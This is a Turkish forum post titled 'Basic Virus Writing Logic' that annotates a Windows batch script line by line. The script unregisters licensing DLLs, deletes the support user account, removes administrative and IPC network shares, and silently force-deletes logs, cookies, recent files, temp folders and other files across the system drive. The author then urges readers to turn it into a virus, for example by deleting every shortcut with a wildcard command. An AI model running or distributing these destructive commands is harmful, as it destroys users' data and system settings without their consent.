
Basit Bir Virüs Yazma Mantığı
Arşivimi gezerken gördüğüm bir dökümanı sizlerle de paylaşmak istedim.Aslında bu bir virüs değil ama bilgisayarınıza zarar verebilecek nitelikte yazılmış bir .bat kod örneğidir.
Buyrun Bakalım neymiş;
- regsvr32.exe /u %windir%\system32\licdll.dll // -u komutu Unregister yapıyor bu .dll li service'yi yani kullanımını bitiriyor alttaki satır içinde aynı şey
- regsvr32.exe /u %windir%\system32\regwizc.dll
- net user support_388945a0 /delete // bu satir ise bilgisayarınızda bulunan "support" kullanıcısını siliyor
- @echo off
- net share Yazıcı /delete /* Yazıcı nın paylaşımını kapatıyor ve alttakiler içinde aynı dosya sistemlerinin paylaşımlarını siliyor kısaca bilgisayarınızda network üzerinde paylaşıma acil olabilecek şeyleri kapatıyor.
- net share c$ /d
- net share d$ /d
- net share f$ /d
- net share g$ /d
- net share h$ /d
- net share e$ /d
- net share admin$ /d
- net share IPC$ /d
- net share print$ /delete
- @echo off
- echo temizlik zamani(coded by inkazuba)...... //burdada dos shell'inizin ekranına yazıları bastırmak istenmiş
- del /f /s /q %systemdrive%\*.tmp // bu ve arkasından gelen del komutu ise %systemdrive% windows'un kurulu olduğu driver'ı işaret eder örnek C:
- del /f /s /q %systemdrive%\*._mp // *. demek ismi ne olursa olsun yani del *.spark yaparsanız uzantısı .spark olan herşeyi sil demek
- del /f /s /q %systemdrive%\*.log // bildiğiniz gibi FILE'ların attribute'leri vardır. attrib -q -s -h haklarını belirtilen dosya ya verirsiniz
- del /f /s /q %systemdrive%\*.flv // gereksiz bir çok uzantıyı /s sub folder'lardan da sil demek /f read-only olsa bile görmezden gel ve sil demek
- del /f /s /q %systemdrive%\*.gid // /q ise hiç uyarı vermeden sil , yani yes no diye sormasın önemli dosyalar gibi dosyalarda
- del /f /s /q %systemdrive%\*.chk
- del /f /s /q %systemdrive%\*.old
- del /f /s /q %systemdrive%\recycled\*.* // *.* demek ismi ve uzantısı ne olursa olsun her File'i sil.
- del /f /s /q %windir%\*.bak // %windir% ise windowsun kurulu olduğu klasorü işaret eder
- del /f /s /q %windir%\prefetch\*.*
- rd /s /q %windir%\temp & md %windir%\temp // rd ise remove dir den gelir dizinleri silmek icin (Burada TEMPklasörü komple kaldırılmaktadır)
- del /f /q %userprofile%\cookies\*.*
- del /f /q %userprofile%\recent\*.* // %userprofile% ise shell de o anki kullanıcı olduğunuz sistemdeki profilinizin Document and Setting yani
- del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
- del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
- del /f /s /q "%userprofile%\recent\*.*"
- echo temizlik bitti (coded by inka)
- echo. & pause // C ve C++ cı ların bildiği system("PAUSE"); olayı
- bunu virüse çevirip her türlü pislik içinde kullanabilirsin örneğin şöyle bir kod yazarsanız;
- "del /f /s /q %systemdrive%\*.lnk" yaparsanız windowsta ki tüm kısayolları siler.
Bir .bat kodunun açılımını öğrendik umarım .bat kodlama ile alakalı fikir vermişizdir.